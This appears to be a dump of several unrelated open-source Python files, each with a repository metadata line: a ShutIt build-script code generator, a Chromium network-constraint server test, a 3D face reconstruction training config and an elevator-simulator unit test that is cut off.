sections.update({'stop_section':stop_section})
# dependencies section
shutitfile_depends = []
for item in shutitfile_representation['shutitfile']['depends']:
shutitfile_depends.append(item[1])
if shutitfile_depends:
depends = "'" + skel_depends + "','" + "','".join(shutitfile_depends) + "'"
else:
depends = "'" + skel_depends + "'"
if shutitfile_representation['shutitfile']['default_include'] == 'false':
default_include = 'no'
elif shutitfile_representation['shutitfile']['default_include'] == 'true':
default_include = 'yes'
else:
shutit.fail('Unrecognised DEFAULT_INCLUDE - must be true/false: ' + shutitfile_representation['shutitfile']['default_include'])
if shutitfile_representation['shutitfile']['module_id']:
module_id = shutitfile_representation['shutitfile']['module_id']
else:
module_id = skel_module_name
return sections, module_id, module_id, depends, default_include
def handle_shutitfile_config_line(line):
shutitfile_command = line[0].upper()
build = ''
numtabs = 2
assert shutitfile_command in ('CONFIG','CONFIG_SECRET'), '%r is not a handled config command' % shutitfile_command
if shutitfile_command in ('CONFIG','CONFIG_SECRET'):
shutitfile_args = parse_shutitfile_args(line[1])
assert isinstance(shutitfile_args, (dict,list))
if shutitfile_command == 'CONFIG':
secret_str = 'False'
elif shutitfile_command == 'CONFIG_SECRET':
secret_str = 'True'
if isinstance(shutitfile_args, list):
assert len(shutitfile_args) in (1,2), 'CONFIG/CONFIG_SECRET takes one or two arguments'
cfg_name = shutitfile_args[0]
if len(shutitfile_args) == 1:
build += """\n""" + numtabs*'\t' + """shutit.get_config(self.module_id,'""" + cfg_name + """',secret=""" + secret_str + """)"""
elif len(shutitfile_args) == 2:
cfg_default = shutitfile_args[1]
build += """\n""" + numtabs*'\t' + """shutit.get_config(self.module_id,'""" + cfg_name + """',default='""" + cfg_default + """',secret=""" + secret_str + """)"""
return build
def handle_shutitfile_script_line(shutit, line, numpushes, wgetgot, numlogins, ifdepth, current_note):
shutitfile_command = line[0].upper()
build = ''
numtabs = 2 + ifdepth
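# Generated code is indented two tabs for the method body, plus one extra tab
# per enclosing IF/ELIF block.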
assert shutitfile_command in ('RUN','SEND','SEND_EXPECT','SEND_EXPECT_MULTI','EXPECT_REACT','SEND_EXPECT_REACT','SEND_UNTIL','UNTIL','UNTIL','ASSERT_OUTPUT_SEND','ASSERT_OUTPUT','PAUSE_POINT','EXPECT','EXPECT_MULTI','LOGIN','USER','LOGOUT','GET_AND_SEND_PASSWORD','LOGIN_WITH_PASSWORD','USER_WITH_PASSWORD','WORKDIR','COPY','ADD','ENV','INSTALL','REMOVE','COMMENT','NOTE','IF','ELSE','ELIF','IF_NOT','ELIF_NOT','ENDIF','RUN_SCRIPT','SCRIPT_BEGIN','START_BEGIN','START_END','STOP_BEGIN','STOP_END','TEST_BEGIN','TEST_END','BUILD_BEGIN','BUILD_END','ISINSTALLED_BEGIN','ISINSTALLED_END','COMMIT','PUSH','REPLACE_LINE','ENSURE_LINE','LOG','QUIT','STORE_RUN','VAGRANT_LOGIN','VAGRANT_LOGOUT'), '%r is not a handled script command' % shutitfile_command
if shutitfile_command in ('RUN','SEND'):
shutitfile_args = parse_shutitfile_args(line[1])
assert isinstance(shutitfile_args, list)
cmd = scan_text(' '.join(shutitfile_args).replace("'", "\\'"))
build += """\n""" + numtabs*'\t' + """shutit.send('''""" + cmd + """''',note='''""" + current_note + """''')"""
current_note = ''
elif shutitfile_command == 'SEND_EXPECT':
shutitfile_args = parse_shutitfile_args(line[1])
assert isinstance(shutitfile_args, list)
cmd = scan_text(' '.join(shutitfile_args).replace("'", "\\'"))
build += """\n""" + numtabs*'\t' + """shutit.send('''""" + cmd + """''',note='''""" + current_note + """''',expect="""
current_note = ''
elif shutitfile_command == 'EXPECT':
shutitfile_args = parse_shutitfile_args(line[1])
assert isinstance(shutitfile_args, list)
cmd = scan_text(' '.join(shutitfile_args).replace("'", "\\'"))
build += """'''""" + cmd + """''')"""
elif shutitfile_command == 'SEND_EXPECT_MULTI':
shutitfile_args = parse_shutitfile_args(line[1])
assert isinstance(shutitfile_args, list)
cmd = scan_text(' '.join(shutitfile_args).replace("'", "\\'"))
build += """\n""" + numtabs*'\t' + """shutit.multisend('''""" + cmd + """''',"""
current_note = ''
elif shutitfile_command == 'EXPECT_MULTI':
shutitfile_args = parse_shutitfile_args(line[1])
assert isinstance(shutitfile_args, dict)
multi_dict = str(shutitfile_args)
build += multi_dict + """,note='''""" + current_note + """''')"""
elif shutitfile_command == 'SEND_EXPECT_REACT':
shutitfile_args = parse_shutitfile_args(line[1])
assert isinstance(shutitfile_args, list)
cmd = scan_text(' '.join(shutitfile_args).replace("'", "\\'"))
build += """\n""" + numtabs*'\t' + """shutit.send('''""" + cmd + """''',note='''""" + current_note + """''',follow_on_commands="""
current_note = ''
elif shutitfile_command == 'EXPECT_REACT':
shutitfile_args = parse_shutitfile_args(line[1])
assert isinstance(shutitfile_args, dict)
multi_dict = str(shutitfile_args)
# We don't check exit here, as reactions will often have failing commands.
build += multi_dict + ",check_exit=False)"
elif shutitfile_command == 'SEND_UNTIL':
shutitfile_args = parse_shutitfile_args(line[1])
assert isinstance(shutitfile_args, list)
cmd = scan_text(' '.join(shutitfile_args).replace("'", "\\'"))
build += """\n""" + numtabs*'\t' + """shutit.send_until('''""" + cmd + """''',"""
current_note = ''
elif shutitfile_command == 'UNTIL':
shutitfile_args = parse_shutitfile_args(line[1])
assert isinstance(shutitfile_args, list)
cmd = scan_text(' '.join(shutitfile_args).replace("'", "\\'"))
build += """'''""" + cmd + """''',note='''""" + current_note + """''')"""
elif shutitfile_command == 'PAUSE_POINT':
shutitfile_args = parse_shutitfile_args(line[1])
assert isinstance(shutitfile_args, list)
msg = scan_text(' '.join(shutitfile_args).replace("'", "\\'"))
build += """\n""" + numtabs*'\t' + """shutit.pause_point('''""" + msg + """''')"""
elif shutitfile_command == 'QUIT':
shutitfile_args = parse_shutitfile_args(line[1])
assert isinstance(shutitfile_args, list)
cmd = scan_text(' '.join(shutitfile_args).replace("'", "\\'"))
build += """\n""" + numtabs*'\t' + """shutit.fail('''""" + cmd + """''')"""
elif shutitfile_command == 'LOGOUT':
build += """\n""" + numtabs*'\t' + """shutit.logout(note='''""" + current_note + """''')"""
current_note = ''
numlogins -= 1
elif shutitfile_command == 'VAGRANT_LOGIN':
shutitfile_args = parse_shutitfile_args(line[1])
assert isinstance(shutitfile_args, list)
machine_name = scan_text(' '.join(shutitfile_args).replace("'", "\\'"))
build += """\n""" + numtabs*'\t' + """shutit.login('''vagrant ssh """ + machine_name + """''',note='''""" + current_note + """''')"""
build += """\n""" + numtabs*'\t' + """shutit.login('''sudo su -''')"""
current_note = ''
numlogins += 1
elif shutitfile_command == 'VAGRANT_LOGOUT':
build += """\n""" + numtabs*'\t' + """shutit.logout()"""
build += """\n""" + numtabs*'\t' + """shutit.logout(note='''""" + current_note + """''')"""
current_note = ''
numlogins -= 1
elif shutitfile_command == 'ASSERT_OUTPUT_SEND':
shutitfile_args = parse_shutitfile_args(line[1])
assert isinstance(shutitfile_args, list)
cmd = scan_text(' '.join(shutitfile_args).replace("'", "\\'"))
build += """\n""" + numtabs*'\t' + """_cmd = '''""" + cmd + """'''\n\t\t_output = shutit.send_and_get_output('''""" + cmd + """''',note='''""" + current_note + """''')\n\t\timport re\n\t\tif not re.match('''"""
current_note = ''
elif shutitfile_command == 'ASSERT_OUTPUT':
shutitfile_args = parse_shutitfile_args(line[1])
assert isinstance(shutitfile_args, list)
expected_output = scan_text(' '.join(shutitfile_args).replace("'", "\\'"))
build += expected_output + """''', _output):\n""" + numtabs*'\t' + """\tshutit.pause_point('''Output of: ''' + _cmd + ''' was: ''' + _output + ''' It should be: """ + expected_output + """''')"""
elif shutitfile_command == 'LOGIN':
shutitfile_args = parse_shutitfile_args(line[1])
assert isinstance(shutitfile_args, list)
cmd = scan_text(' '.join(shutitfile_args).replace("'", "\\'"))
build += """\n""" + numtabs*'\t' + """shutit.login(command='""" + cmd + """',note='''""" + current_note + """''')"""
current_note = ''
numlogins += 1
elif shutitfile_command == 'USER':
shutitfile_args = parse_shutitfile_args(line[1])
assert isinstance(shutitfile_args, list)
cmd = scan_text(' '.join(shutitfile_args).replace("'", "\\'"))
build += """\n""" + numtabs*'\t' + """shutit.login(user='""" + cmd + """',note='''""" + current_note + """''')"""
current_note = ''
numlogins += 1
elif shutitfile_command == 'GET_AND_SEND_PASSWORD':
shutitfile_args = parse_shutitfile_args(line[1])
assert isinstance(shutitfile_args, list)
msg = scan_text(' '.join(shutitfile_args)) + '\n'
build += """\n""" + numtabs*'\t' + """_password = shutit.get_input('''""" + msg + """''',ispass=True)"""
build += """\n""" + numtabs*'\t' + """shutit.send(_password,echo=False,check_exit=False,note='''""" + current_note + """''')"""
current_note = ''
elif shutitfile_command == 'LOGIN_WITH_PASSWORD':
shutitfile_args = parse_shutitfile_args(line[1])
assert isinstance(shutitfile_args, list)
cmd = scan_text(' '.join(shutitfile_args).replace("'", "\\'"))
msg = scan_text(line[2]) + '\n'
build += """\n""" + numtabs*'\t' + """_password = shutit.get_input('''""" + msg + """''',ispass=True)"""
build += """\n""" + numtabs*'\t' + """shutit.login(command='""" + cmd + """', password=_password,note='''""" + current_note + """''')"""
current_note = ''
elif shutitfile_command == 'USER_WITH_PASSWORD':
shutitfile_args = parse_shutitfile_args(line[1])
assert isinstance(shutitfile_args, list)
cmd = scan_text(' '.join(shutitfile_args).replace("'", "\\'"))
msg = scan_text(line[2]) + '\n'
build += """\n""" + numtabs*'\t' + """_password = shutit.get_input('''""" + msg + """''',ispass=True)"""
build += """\n""" + numtabs*'\t' + """shutit.login(user='""" + cmd + """', password=_password,note='''""" + current_note + """''')"""
current_note = ''
elif shutitfile_command == 'WORKDIR':
shutitfile_args = parse_shutitfile_args(line[1])
assert isinstance(shutitfile_args, list)
cmd = scan_text(' '.join(shutitfile_args).replace("'", "\\'"))
build += """\n""" + numtabs*'\t' + """shutit.send('''pushd """ + cmd + """''',echo=False,note='''""" + current_note + """''')"""
current_note = ''
numpushes += 1
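# WORKDIR is emulated with pushd; any pushd still open is balanced by popd
# calls appended at the end of the section (see the numpushes bookkeeping).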
elif shutitfile_command == 'COPY' or shutitfile_command == 'ADD':
shutitfile_args = parse_shutitfile_args(line[1])
assert isinstance(shutitfile_args, list)
# The <src> path must be inside the context of the build; you cannot COPY ../something /something, because the first step of a docker build is to send the context directory (and subdirectories) to the docker daemon.
if shutitfile_args[0][0:2] == '..' or shutitfile_args[0][0] == '/' or shutitfile_args[0][0] == '~':
shutit.fail('Invalid line: ' + str(shutitfile_args) + ' file must be in local subdirectory')
if shutitfile_args[1][-1] == '/':
# Dir we're COPYing or ADDing to
destdir = scan_text(shutitfile_args[1])
# File/dir we're COPYing or ADDing from
fromfile = scan_text(shutitfile_args[0])
# Final file/dir
outfile = destdir + fromfile
if os.path.isfile(fromfile):
outfiledir = os.path.dirname(fromfile)
build += """\n""" + numtabs*'\t' + """shutit.send('''mkdir -p """ + destdir + """/""" + outfiledir + """''',note='''""" + current_note + """''')"""
current_note = ''
elif os.path.isdir(fromfile):
build += """\n""" + numtabs*'\t' + """shutit.send('''mkdir -p """ + destdir + fromfile + """''',note='''""" + current_note + """''')"""
current_note = ''
else:
outfile = shutitfile_args[1]
# If this is something we have to wget:
if shutitfile_command == 'ADD' and urlparse(shutitfile_args[0])[0] != '':
if not wgetgot:
build += """\n""" + numtabs*'\t' + """shutit.install('wget')"""
wgetgot = True
if shutitfile_args[1][-1] == '/':
destdir = scan_text(destdir[0:-1])
outpath = scan_text(urlparse(shutitfile_args[0])[2])
outpathdir = os.path.dirname(outpath)
build += """\n""" + numtabs*'\t' + """shutit.send('''mkdir -p """ + destdir + outpathdir + """''')"""
build += """\n""" + numtabs*'\t' + """shutit.send('''wget -O """ + destdir + outpath + ' ' + shutitfile_args[0] + """''',note='''""" + current_note + """''')"""
current_note = ''
else:
outpath = scan_text(shutitfile_args[1])
destdir = scan_text(os.path.dirname(shutitfile_args[1]))
build += """\n""" + numtabs*'\t' + """shutit.send('''mkdir -p """ + destdir + """''')"""
build += """\n""" + numtabs*'\t' + """shutit.send('''wget -O """ + outpath + ' ' + shutitfile_args[0] + """''',note='''""" + current_note + """''')"""
current_note = ''
else:
# From the local filesystem on construction:
localfile = scan_text(shutitfile_args[0])
# Local file location on build:
buildstagefile = scan_text(shutitfile_args[0])
#if localfile[-4:] == '.tar':
# build += """\n\t\tshutit.send_file('""" + outfile + '/' + localfile + """')"""
#elif localfile[-4:] == '.bz2':
#elif localfile[-3:] == '.gz':
#elif localfile[-3:] == '.xz':
if os.path.isdir(localfile):
build += """\n""" + numtabs*"""\t""" + """shutit.send_host_dir('''""" + outfile + """''', '''""" + buildstagefile + """''',note='''""" + current_note + """''')"""
current_note = ''
else:
build += """\n""" + numtabs*"""\t""" + """shutit.send_host_file('''""" + outfile + """''', '''""" + buildstagefile + """''',note='''""" + current_note + """''')"""
current_note = ''
elif shutitfile_command == 'ENV':
shutitfile_args = parse_shutitfile_args(line[1])
assert isinstance(shutitfile_args, dict)
for k,v in iteritems(shutitfile_args):
k = scan_text(k)
v = scan_text(v)
build += """\n""" + numtabs*"""\t""" + """shutit.send('''export """ + k + '=' + v + """''',note='''""" + current_note + """''')"""
current_note = ''
elif shutitfile_command == 'INSTALL':
shutitfile_args = parse_shutitfile_args(line[1])
assert isinstance(shutitfile_args, list)
build += """\n""" + numtabs*"""\t""" + """shutit.install('''""" + scan_text(' '.join(shutitfile_args)) + """''',note='''""" + current_note + """''')"""
current_note = ''
elif shutitfile_command == 'REMOVE':
shutitfile_args = parse_shutitfile_args(line[1])
assert isinstance(shutitfile_args, list)
build += """\n""" + numtabs*'\t' + """shutit.remove('''""" + scan_text(' '.join(shutitfile_args)) + """''',note='''""" + current_note + """''')"""
current_note = ''
elif shutitfile_command in ('COMMENT','NOTE'):
shutitfile_args = parse_shutitfile_args(line[1])
assert isinstance(shutitfile_args, list)
# A COMMENT/NOTE line should precede the line it annotates; its text is 'consumed' as the note attached to that next generated call.
build += """\n""" + numtabs*"""\t""" + """# """ + scan_text(' '.join(shutitfile_args))
current_note += scan_text(' '.join(shutitfile_args))
elif shutitfile_command in ('IF','IF_NOT'):
subcommand = scan_text(line[1])
subcommand_args = scan_text(' '.join(line[2:]))
if subcommand == 'FILE_EXISTS':
statement = """shutit.file_exists('''""" + subcommand_args + """''',directory=None,note='''""" + current_note + """''')"""
current_note = ''
elif subcommand == 'INSTALL_TYPE':
statement = """shutit.get_current_shutit_pexpect_session_environment(note='''""" + current_note + """''').install_type == '''""" + subcommand_args + """'''"""
current_note = ''
elif subcommand == 'RUN':
statement = """shutit.send_and_return_status('''""" + subcommand_args + """''',note='''""" + current_note + """''')"""
current_note = ''
else:
shutit.fail('subcommand: ' + subcommand + ' not handled')
if shutitfile_command == 'IF':
build += """\n""" + numtabs*"""\t""" + """if """ + statement + """:"""
elif shutitfile_command == 'IF_NOT':
build += """\n""" + numtabs*"""\t""" + """if not """ + statement + """:"""
ifdepth += 1
elif shutitfile_command == 'ELSE':
build += """\n""" + (numtabs-1)*"""\t""" + """else:"""
elif shutitfile_command in ('ELIF','ELIF_NOT'):
subcommand = scan_text(line[1])
subcommand_args = scan_text(' '.join(line[2:]))
if subcommand == 'FILE_EXISTS':
statement = """shutit.file_exists('''""" + subcommand_args + """''',directory=None,note='''""" + current_note + """''')"""
current_note = ''
elif subcommand == 'INSTALL_TYPE':
statement = """shutit.get_current_shutit_pexpect_session_environment(note='''""" + current_note + """''').install_type == '""" + subcommand_args + """'"""
current_note = ''
elif subcommand == 'RUN':
statement = """shutit.send_and_return_status('''""" + subcommand_args + """''',note='''""" + current_note + """''')"""
current_note = ''
else:
shutit.fail('subcommand: ' + subcommand + ' not handled')
if shutitfile_command == 'ELIF':
build += """\n""" + (numtabs-1)*'\t' + '''elif ''' + statement + ''':'''
elif shutitfile_command == 'ELIF_NOT':
build += """\n""" + (numtabs-1)*"""\t""" + """elif not """ + statement + """:"""
elif shutitfile_command == 'ENDIF':
ifdepth -= 1
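# ENDIF emits no code of its own; it only drops subsequent generated lines
# back one indentation level.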
elif shutitfile_command == 'RUN_SCRIPT':
shutitfile_args = line[1]
assert isinstance(shutitfile_args, str)
script = scan_text(shutitfile_args)
build += """\n""" + numtabs*"""\t""" + """shutit.run_script('''""" + script + """''',note='''""" + current_note + """''')"""
current_note = ''
elif shutitfile_command == 'COMMIT':
shutitfile_args = parse_shutitfile_args(line[1])
assert isinstance(shutitfile_args, list)
assert len(shutitfile_args) == 1
repo_name = scan_text(shutitfile_args[0])
_default_repo_name = 'mymodule'
if repo_name == _default_repo_name:
shutit.log('The docker container will be committed with the default repo_name: ' + _default_repo_name + '.\nYou can change this by adding this to the ~/.shutit/config file:\n\n[repository]\nname:yourname\n\nand re-running.',level=logging.WARNING)
if len(shutitfile_args) == 1:
build += """\n""" + numtabs*"""\t""" + """shutit.do_repository_work('''""" + repo_name + """''',force=None,tag=True,note='''""" + current_note + """''')"""
current_note = ''
elif shutitfile_command == 'PUSH':
shutitfile_args = parse_shutitfile_args(line[1])
assert isinstance(shutitfile_args, list)
assert len(shutitfile_args) == 1
assert shutit.repository['user'] != '', 'If you want to push, set the [repository] settings (user,password,email) in your ~/.shutit/config file.'
repo_name = scan_text(shutitfile_args[0])
build += """\n""" + numtabs*"""\t""" + """shutit.push_repository('''""" + repo_name + """''',note='''""" + current_note + """''')"""
current_note = ''
elif shutitfile_command == 'REPLACE_LINE':
shutitfile_args = parse_shutitfile_args(line[1])
assert isinstance(shutitfile_args, dict)
# TODO: assert existence of these
line = scan_text(shutitfile_args['line'])
filename = scan_text(shutitfile_args['filename'])
pattern = scan_text(shutitfile_args['pattern'])
build += """\n""" + numtabs*'\t' + """shutit.replace_text('''""" + line + """''','''""" + filename + """''',pattern='''""" + pattern + """''',note='''""" + current_note + """''')"""
current_note = ''
elif shutitfile_command == 'ENSURE_LINE':
shutitfile_args = parse_shutitfile_args(line[1])
assert isinstance(shutitfile_args, dict)
# TODO: assert existence of these
line = scan_text(shutitfile_args['line'])
filename = scan_text(shutitfile_args['filename'])
build += """\n""" + numtabs*'\t' + """shutit.replace_text('''""" + line + """''','''""" + filename + """''',pattern='''""" + line + """''',note='''""" + current_note + """''')"""
current_note = ''
elif shutitfile_command == 'LOG':
shutitfile_args = scan_text(line[1])
assert isinstance(shutitfile_args, str) and shutitfile_args in ('DEBUG','WARNING','CRITICAL','INFO','ERROR')
build += """\n""" + numtabs*'\t' + """import logging"""
build += """\n""" + numtabs*'\t' + """logging.getLogger().setLevel(logging.""" + shutitfile_args + """)"""
elif shutitfile_command == 'STORE_RUN':
config_item = scan_text(line[1])
command = scan_text(' '.join(line[2:]))
build += """\n""" + numtabs*'\t' + """shutit.cfg[self.module_id]['""" + config_item + """'] = shutit.send_and_get_output('''""" + command + """''',note='''""" + current_note + """''')"""
current_note = ''
# See shutitfile_get_section
elif shutitfile_command in ('SCRIPT_BEGIN','START_BEGIN','START_END','STOP_BEGIN','STOP_END','TEST_BEGIN','TEST_END','BUILD_BEGIN','BUILD_END','ISINSTALLED_BEGIN','ISINSTALLED_END'):
# No action to perform on these lines, but they are legal.
pass
else:
shutit.fail('shutitfile_command: ' + shutitfile_command + ' not handled')
return build, numpushes, wgetgot, numlogins, ifdepth, current_note
def scan_text(text):
"""Scan text, and replace items that match shutit's pattern format, ie:
{{ shutit.THING }}
"""
while True:
match = re.match("(.*){{ shutit.(.*) }}(.*)$", text)
if match:
before = match.group(1)
name = match.group(2)
after = match.group(3)
text = before + """''' + shutit.cfg[self.module_id][\"""" + name + """\"] + '''""" + after
else:
break
return text
# Get the section of the shutitfile we are in.
def shutitfile_get_section(shutitfile_command, current):
match = re.match(r'^(.*)_(BEGIN|END)$',shutitfile_command)
if match:
section = match.group(1)
stage = match.group(2)
if stage == 'BEGIN':
return section.lower()
return 'build'
return current
|
media/tools/constrained_network_server/cns_test.py | Scopetta197/chromium | 212 | 12609904 | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Tests for Constrained Network Server."""
import os
import signal
import subprocess
import tempfile
import time
import unittest
import urllib2
import cns
import traffic_control
# The local interface to test on.
_INTERFACE = 'lo'
class PortAllocatorTest(unittest.TestCase):
"""Unit tests for the Port Allocator class."""
# Expiration time for ports. In mock time.
_EXPIRY_TIME = 6
def setUp(self):
# Mock out time.time() to accelerate port expiration testing.
self._old_time = time.time
self._current_time = 0
time.time = lambda: self._current_time
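# The code under test reads wall-clock time via time.time(), so bumping
# self._current_time simulates elapsed time without real sleeps.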
# TODO(dalecurtis): Mock out actual calls to shadi's port setup.
self._pa = cns.PortAllocator(cns._DEFAULT_CNS_PORT_RANGE, self._EXPIRY_TIME)
self._MockTrafficControl()
def tearDown(self):
self._pa.Cleanup(_INTERFACE, all_ports=True)
# Ensure ports are cleaned properly.
self.assertEquals(self._pa._ports, {})
time.time = self._old_time
self._RestoreTrafficControl()
def _MockTrafficControl(self):
self.old_CreateConstrainedPort = traffic_control.CreateConstrainedPort
self.old_DeleteConstrainedPort = traffic_control.DeleteConstrainedPort
self.old_TearDown = traffic_control.TearDown
traffic_control.CreateConstrainedPort = lambda config: True
traffic_control.DeleteConstrainedPort = lambda config: True
traffic_control.TearDown = lambda config: True
def _RestoreTrafficControl(self):
traffic_control.CreateConstrainedPort = self.old_CreateConstrainedPort
traffic_control.DeleteConstrainedPort = self.old_DeleteConstrainedPort
traffic_control.TearDown = self.old_TearDown
def testPortAllocator(self):
# Ensure Get() succeeds and returns the correct port.
self.assertEquals(self._pa.Get('test'), cns._DEFAULT_CNS_PORT_RANGE[0])
# Call again with the same key and make sure we get the same port.
self.assertEquals(self._pa.Get('test'), cns._DEFAULT_CNS_PORT_RANGE[0])
# Call with a different key and make sure we get a different port.
self.assertEquals(self._pa.Get('test2'), cns._DEFAULT_CNS_PORT_RANGE[0] + 1)
# Update fake time so that ports should expire.
self._current_time += self._EXPIRY_TIME + 1
# Test to make sure cache is checked before expiring ports.
self.assertEquals(self._pa.Get('test2'), cns._DEFAULT_CNS_PORT_RANGE[0] + 1)
# Update fake time so that ports should expire.
self._current_time += self._EXPIRY_TIME + 1
# Request a new port, old ports should be expired, so we should get the
# first port in the range. Make sure this is the only allocated port.
self.assertEquals(self._pa.Get('test3'), cns._DEFAULT_CNS_PORT_RANGE[0])
self.assertEquals(self._pa._ports.keys(), [cns._DEFAULT_CNS_PORT_RANGE[0]])
def testPortAllocatorExpiresOnlyCorrectPorts(self):
# Ensure Get() succeeds and returns the correct port.
self.assertEquals(self._pa.Get('test'), cns._DEFAULT_CNS_PORT_RANGE[0])
# Stagger port allocation so we can ensure only ports older than the
# expiry time are actually expired.
self._current_time += self._EXPIRY_TIME / 2 + 1
# Call with a different key and make sure we get a different port.
self.assertEquals(self._pa.Get('test2'), cns._DEFAULT_CNS_PORT_RANGE[0] + 1)
# After this time advance, the port with key 'test' should expire on the next Get().
self._current_time += self._EXPIRY_TIME / 2 + 1
# Call with a different key and make sure we get the first port.
self.assertEquals(self._pa.Get('test3'), cns._DEFAULT_CNS_PORT_RANGE[0])
self.assertEquals(set(self._pa._ports.keys()), set([
cns._DEFAULT_CNS_PORT_RANGE[0], cns._DEFAULT_CNS_PORT_RANGE[0] + 1]))
def testPortAllocatorNoExpiration(self):
# Setup PortAllocator w/o port expiration.
self._pa = cns.PortAllocator(cns._DEFAULT_CNS_PORT_RANGE, 0)
# Ensure Get() succeeds and returns the correct port.
self.assertEquals(self._pa.Get('test'), cns._DEFAULT_CNS_PORT_RANGE[0])
# Update fake time to see if ports expire.
self._current_time += self._EXPIRY_TIME
# Send second Get() which would normally cause ports to expire. Ensure that
# the ports did not expire.
self.assertEquals(self._pa.Get('test2'), cns._DEFAULT_CNS_PORT_RANGE[0] + 1)
self.assertEquals(set(self._pa._ports.keys()), set([
cns._DEFAULT_CNS_PORT_RANGE[0], cns._DEFAULT_CNS_PORT_RANGE[0] + 1]))
class ConstrainedNetworkServerTest(unittest.TestCase):
"""End to end tests for ConstrainedNetworkServer system."""
# Amount of time to wait for the CNS to start up.
_SERVER_START_SLEEP_SECS = 1
# Sample data used to verify file serving.
_TEST_DATA = 'The quick brown fox jumps over the lazy dog'
# Server information.
_SERVER_URL = ('http://127.0.0.1:%d/ServeConstrained?' %
cns._DEFAULT_SERVING_PORT)
# Setting for latency testing.
_LATENCY_TEST_SECS = 1
def _StartServer(self):
"""Starts the CNS, returns pid."""
cmd = ['python', 'cns.py', '--interface=%s' % _INTERFACE]
process = subprocess.Popen(cmd, stderr=subprocess.PIPE)
# Wait for server to startup.
line = True
while line:
line = process.stderr.readline()
if 'STARTED' in line:
return process.pid
self.fail('Failed to start CNS.')
def setUp(self):
# Start the CNS.
self._server_pid = self._StartServer()
# Create temp file for serving. Run after server start so if a failure
# during setUp() occurs we don't leave junk files around.
f, self._file = tempfile.mkstemp(dir=os.getcwd())
os.write(f, self._TEST_DATA)
os.close(f)
# Strip cwd off so we have a proper relative path.
self._relative_fn = self._file[len(os.getcwd()) + 1:]
def tearDown(self):
os.unlink(self._file)
os.kill(self._server_pid, signal.SIGTERM)
def testServerServesFiles(self):
now = time.time()
f = urllib2.urlopen('%sf=%s' % (self._SERVER_URL, self._relative_fn))
# Verify file data is served correctly.
self.assertEqual(self._TEST_DATA, f.read())
# For completeness ensure an unconstrained call takes less time than our
# artificial constraints checked in the tests below.
self.assertTrue(time.time() - now < self._LATENCY_TEST_SECS)
def testServerLatencyConstraint(self):
"""Tests serving a file with a latency network constraint."""
# Abort if we do not have root access.
self.assertEqual(os.geteuid(), 0, 'You need root access to run this test.')
now = time.time()
base_url = '%sf=%s' % (self._SERVER_URL, self._relative_fn)
url = '%s&latency=%d' % (base_url, self._LATENCY_TEST_SECS * 1000)
f = urllib2.urlopen(url)
# Verify file data is served correctly.
self.assertEqual(self._TEST_DATA, f.read())
# Verify the request took longer than the requested latency.
self.assertTrue(time.time() - now > self._LATENCY_TEST_SECS)
# Verify the server properly redirected the URL.
self.assertEquals(f.geturl(), base_url.replace(
str(cns._DEFAULT_SERVING_PORT), str(cns._DEFAULT_CNS_PORT_RANGE[0])))
if __name__ == '__main__':
unittest.main()
|
options.py | JungahYang/Deep3DFaceReconstruction | 1,424 | 12609918 | <filename>options.py
import numpy as np
import tensorflow as tf
import os
# training options
class Option():
def __init__(self,model_name=None,is_train=True):
#--------------------------------------------------------------------------------------
self.is_train = is_train
self.model_dir = 'result'
if model_name is None:
self.model_name = 'model_test'
else:
self.model_name = model_name
self.data_path = ['./processed_data']
self.val_data_path = ['./processed_data']
self.model_save_path = os.path.join(self.model_dir,self.model_name)
if self.is_train:
if not os.path.exists(self.model_save_path):
os.makedirs(self.model_save_path)
self.summary_dir = os.path.join(self.model_save_path,'summary')
self.train_summary_path = os.path.join(self.summary_dir, 'train')
self.val_summary_path = os.path.join(self.summary_dir, 'val')
#---------------------------------------------------------------------------------------
# visible gpu settings
self.config = tf.ConfigProto()
self.config.gpu_options.visible_device_list = '0'
self.use_pb = True
#---------------------------------------------------------------------------------------
# training parameters
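# The w_* values below are weights balancing the individual loss terms
# (photometric, landmark, identity/perceptual, coefficient regularisation,
# etc.) in the total training loss; the exact mapping of each weight to its
# term is defined where the loss is assembled.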
self.w_photo = 1.92
self.w_lm = 1.6e-3
self.w_id = 0.2
self.w_reg = 3.0e-4
self.w_ref = 5.0
self.w_gamma = 10.0
self.w_ex = 0.8
self.w_tex = 1.7e-2
self.batch_size = 16
self.boundaries = [100000]
lr = [1e-4,2e-5]
self.global_step = tf.Variable(0,name='global_step',trainable = False)
self.lr = tf.train.piecewise_constant(self.global_step,self.boundaries,lr)
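# Piecewise-constant schedule: learning rate 1e-4 for the first 100k
# iterations, then 2e-5.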
self.augment = True
self.train_maxiter = 200000
self.train_summary_iter = 50
self.image_summary_iter = 200
self.val_summary_iter = 1000
self.save_iter = 10000
#---------------------------------------------------------------------------------------
# initial weights for resnet and facenet
self.R_net_weights = os.path.join('./weights/resnet','resnet_v1_50.ckpt')
self.Perceptual_net_weights = './weights/id_net/model-20170512-110547.ckpt-250000'
self.pretrain_weights = os.path.join('train/model_test','iter_100000.ckpt')
|
rlschool/liftsim/environment/mansion/test_elevator.py | ANCL/QuadPPO | 169 | 12609936 | <reponame>ANCL/QuadPPO<filename>rlschool/liftsim/environment/mansion/test_elevator.py
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Unit test class
"""
from rlschool.liftsim.environment.mansion.person_generators.uniform_generator import UniformPersonGenerator
from rlschool.liftsim.environment.mansion import person_generators
from rlschool.liftsim.environment.mansion.person_generators import uniform_generator
from rlschool.liftsim.environment.mansion.utils import PersonType, MansionState, ElevatorState, ElevatorAction
from rlschool.liftsim.environment.mansion.elevator import Elevator
from rlschool.liftsim.environment.mansion.mansion_manager import MansionManager
from rlschool.liftsim.environment.mansion.mansion_config import MansionConfig
import sys
import unittest
import mock
class TestElevator(unittest.TestCase):
# checked
# @unittest.skip("test")
@mock.patch("person_generators.uniform_generator.UniformPersonGenerator")
def test_door_load_unload(self, mock_uniformgenerator):
"""
stop at the target, load and unload corresponding passengers, open and close the door properly
"""
max_floors = 8
world = MansionConfig(
dt=0.50,
number_of_floors=max_floors,
floor_height=4.0)
test_elevator = Elevator(start_position=0.0,
mansion_config=world,
name="test_elevator")
test_elevator._direction = 1
